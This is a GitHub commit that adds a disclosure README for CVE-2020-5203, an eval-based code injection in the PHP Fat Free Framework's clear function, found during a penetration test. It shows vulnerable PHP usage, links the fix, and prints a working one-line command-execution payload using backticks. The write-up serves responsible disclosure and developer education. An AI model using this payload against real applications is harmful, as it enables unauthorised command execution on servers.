Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
1 changed file
with
35 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,35 @@ | ||
# CVE-2020-5203 | ||
|
||
This vulnerability was found during a penetration test for a company that uses the PHP Fat Free Framework. Responsible disclosure guidelines were followed, where a fix was issued by the company that hired me and the group behind the framework. | ||
|
||
## How it Works | ||
|
||
The exploitation depends on how the developer choose to use the vulnerable "Clear" function. For it to work, untrusted content must be passed to the function without any sanitization. | ||
|
||
Take the examples: | ||
|
||
<?php | ||
... includes | ||
$input = $_GET['session']; | ||
$f3->clear($input); // vulnerable | ||
$f3->clear($_GET['session']); // vulnerable | ||
$f3->clear("SESSION.".$_GET['session']); // vulnerable | ||
$f3->clear("SESSION.ABC"); // NOT vulnerable | ||
?> | ||
|
||
During my pentest, the application was setting session variables names with user controlled input, as one of the examples. | ||
|
||
The vulnerability exists because the function eventually passes the input to an eval, allowing malicious actors to "break" the structure to inject malicious code. | ||
|
||
The [FIX](https://github.com/bcosca/fatfree-core/commit/dae95a0baf3963a9ef87c17cee52f78f77e21829) for this vulnerability can help you better understand the flaw. | ||
|
||
## Exploit | ||
|
||
There are a few ways to exploit the eval for command execution, this one uses the backtick operator and breaks the execution format for our own code: | ||
|
||
0);echo `id`;print('' | ||
|
||
|
||
Thats it. | ||
|
||
Developers, remember that a framework is code as anything else. Don't think it won't have vulnerabilities just because a lot of people may use it, or just because it is open-source. |